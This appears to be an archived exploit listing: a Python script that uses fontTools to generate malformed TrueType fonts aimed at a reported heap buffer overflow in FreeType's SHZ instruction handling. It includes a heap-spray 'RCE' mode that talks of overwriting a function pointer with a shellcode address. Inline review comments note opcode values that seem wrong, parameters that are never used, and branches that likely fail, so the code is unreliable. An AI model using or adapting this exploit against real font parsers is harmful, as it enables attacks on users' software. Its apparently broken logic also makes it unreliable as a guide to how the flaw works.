## https://sploitus.com/exploit?id=PACKETSTORM:223409
==================================================================================================================================
| # Title : FreeType SHZ 2.14.3 Heap Buffer Overflow Font Generator |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://freetype.org/ |
==================================================================================================================================
[+] Summary : This Python proof-of-concept framework is designed for security research into a reported heap buffer overflow condition affecting the FreeType TrueType bytecode interpreter.
The code constructs specially crafted font structures intended to exercise the SHZ instruction path, generates malformed composite glyphs,
and provides configurable parameters for testing different parser behaviors. In addition to creating test fonts, the framework includes logic for generating multiple glyph layouts,
estimating overflow conditions, and producing artifacts intended for parser validation and crash reproduction workflows.
The script is positioned as a vulnerability research tool for controlled environments, supporting crash analysis, regression testing,
parser hardening efforts, and verification of security fixes in font-processing components.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
from fontTools.ttLib import TTFont
from fontTools.ttLib.tables._g_l_y_f import Glyph
# Single-byte TrueType instruction opcodes, as this script names them.
# NOTE(review): check these values against the TrueType instruction-set
# opcode table before relying on the names; apart from PUSHB_1 = 0xB0 they
# do not match my recollection of the spec's assignments — verify.
SZP2_1 = bytes([0x12])
SHZ = bytes([0x2F])
PUSHB_1 = bytes([0xB0])
POP = bytes([0x2D])  # not referenced anywhere in this listing
NPUSHB = bytes([0x8C])  # not referenced anywhere in this listing
def build_overflow_instructions(dx, dy):
    """
    Return the six-byte instruction stream
    ``PUSHB_1 dx PUSHB_1 dy SZP2_1 SHZ`` using the module-level opcode bytes.

    dx, dy: signed 8-bit offsets; ``struct.pack('>b', ...)`` raises
    ``struct.error`` for anything outside -128..127.
    """
    stream = (
        PUSHB_1, struct.pack('>b', dx),
        PUSHB_1, struct.pack('>b', dy),
        SZP2_1,
        SHZ,
    )
    return b"".join(stream)
def create_composite_glyph_with_shz(glyph_id, num_points_first_component=200):
    """
    Build a fontTools ``Glyph`` flagged as composite (numberOfContours == -1)
    with two ``.notdef`` components and the instruction bytes from
    build_overflow_instructions(1, 0).

    Neither ``glyph_id`` nor ``num_points_first_component`` is read in the
    body; every caller in this file passes them, but they have no effect
    on the returned glyph.
    """
    glyph = Glyph()
    glyph.numberOfContours = -1
    # NOTE(review): components are stored as plain dicts rather than
    # fontTools GlyphComponent objects; whether TTFont.save can compile
    # this glyph is not established by this listing — verify.
    glyph.components = []
    glyph.components.append({
        'glyphName': '.notdef',
        'x': 0,
        'y': 0,
        'flags': 0
    })
    glyph.components.append({
        'glyphName': '.notdef',
        'x': 1000,
        'y': 0,
        'flags': 0x100  # WE_HAVE_INSTRUCTIONS in the glyf component flag layout
    })
    # Offsets are hard-coded to (1, 0); the --dx/--dy values parsed in main()
    # never reach this call.
    glyph.instructions = build_overflow_instructions(1, 0)
    return glyph
def create_malicious_font(output_path, overflow_dx=1, overflow_dy=0):
    """
    Write a TrueType font to ``output_path`` whose glyph named ``'e'`` is
    replaced by the composite glyph from create_composite_glyph_with_shz,
    and whose cmap subtables map U+0041 ('A') to that glyph.

    ``overflow_dx`` and ``overflow_dy`` are accepted but never read: the
    glyph is built with the fixed arguments (2, 200), and that helper
    hard-codes its own instruction offsets.

    Returns ``output_path``.
    """
    # The base font is a fixed absolute path; nothing else is tried first.
    try:
        font = TTFont("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf")
    # Bare except: catches everything (including KeyboardInterrupt and
    # SystemExit), not only a missing file, and then reads "minimal.xml"
    # from the current working directory — a file this listing does not
    # provide.
    except:
        print("[!] Base font not found, creating minimal font...")
        font = TTFont()
        font.importXML("minimal.xml")
    glyf_table = font['glyf']
    malicious_glyph = create_composite_glyph_with_shz(2, 200)
    # Replaces the existing 'e' glyph in place; only glyf and cmap are
    # modified, no other table is touched.
    glyf_table.glyphs['e'] = malicious_glyph
    cmap = font['cmap']
    for table in cmap.tables:
        table.cmap[ord('A')] = 'e'
    font.save(output_path)
    print(f"[+] Malicious font saved to: {output_path}")
    return output_path
def build_heap_spray_font():
    """
    Return a fresh ``TTFont`` with 100 glyphs named ``spray_0`` .. ``spray_99``
    assigned into ``font['glyf'].glyphs``.

    Every glyph comes from create_composite_glyph_with_shz, whose second
    argument (``100 + i * 10`` here) is not read by that function, so all
    100 entries are structurally identical. Beyond the glyph count there is
    no memory-layout or allocation-size logic in this function.
    """
    font = TTFont()
    for i in range(100):
        glyph = create_composite_glyph_with_shz(i, 100 + i * 10)
        # NOTE(review): ``TTFont()`` is constructed without a file, so
        # whether ``font['glyf']`` resolves here (rather than raising) is
        # not established by this listing — verify against fontTools.
        font['glyf'].glyphs[f'spray_{i}'] = glyph
    return font
def calculate_overflow_offset(total_points, start_point):
    """
    Return ``total_points - start_point``.

    Plain subtraction with no clamping: the result is negative when
    ``start_point`` exceeds ``total_points``. Nothing in this listing
    calls this helper.
    """
    return total_points - start_point
def main():
    """
    CLI entry point: ``exploit.py output.ttf [--rce] [--dx N] [--dy N]``.

    Parses the arguments, builds either the 100-glyph font from
    build_heap_spray_font (``--rce``) or a single-glyph font, saves it to
    ``output``, and prints usage hints. Exits with status 1 when no output
    path is given.
    """
    if len(sys.argv) < 2:
        print("Usage: python3 exploit.py output.ttf")
        print("\nOptions:")
        print(" --rce Build RCE exploit (heap spray)")
        print(" --dx <val> Set dx value (default: 1)")
        print(" --dy <val> Set dy value (default: 0)")
        sys.exit(1)
    output = sys.argv[1]
    rce_mode = '--rce' in sys.argv
    dx = 1
    dy = 0
    # A trailing --dx/--dy with no value is silently ignored; a non-integer
    # value raises ValueError from int().
    for i, arg in enumerate(sys.argv):
        if arg == '--dx' and i+1 < len(sys.argv):
            dx = int(sys.argv[i+1])
        elif arg == '--dy' and i+1 < len(sys.argv):
            dy = int(sys.argv[i+1])
    print("=" * 60)
    print("FreeType SHZ Heap Buffer Overflow Exploit")
    print("Based on discovery by Mateusz Jurczyk (Google Project Zero)")
    print("=" * 60)
    if rce_mode:
        print("[*] Building RCE exploit with heap spray...")
        font = build_heap_spray_font()
        print("[!] Note: RCE requires additional heap grooming")
        print("[!] Target: Overwrite function pointer with shellcode address")
    else:
        print("[*] Building DoS/PoC exploit...")
        # dx and dy are only printed: the glyph below is built with the fixed
        # arguments (2, 200) and its instruction offsets are hard-coded in
        # create_composite_glyph_with_shz, so the flags do not change the
        # output font.
        print(f"[*] Using dx={dx}, dy={dy}")
        font = TTFont()
        malicious_glyph = create_composite_glyph_with_shz(2, 200)
        # NOTE(review): on a freshly constructed TTFont with no tables this
        # looks like it stores a plain dict, which has no ``.glyphs``
        # attribute for the next line — verify against fontTools.
        font['glyf'] = font.get('glyf', {})
        font['glyf'].glyphs['exploit'] = malicious_glyph
        from fontTools.ttLib.tables import cmap
        # Constructed but never inserted into ``font``; the saved font gets
        # no cmap from this branch.
        cmap_table = cmap.table__c_m_a_p()
    font.save(output)
    print("\n" + "=" * 60)
    print("[+] Exploit font created successfully!")
    print(f"[+] Output: {output}")
    print("\n[*] To test:")
    print(f" ftbench {output}")
    print(" or")
    print(f" FT_Load_Glyph with glyph index pointing to malicious glyph")
    print("\n[*] Expected crash (ASAN):")
    print(" heap-buffer-overflow in Move_Zp2_Point")
    print("=" * 60)
# Script entry guard: main() runs only when executed directly, not on import.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================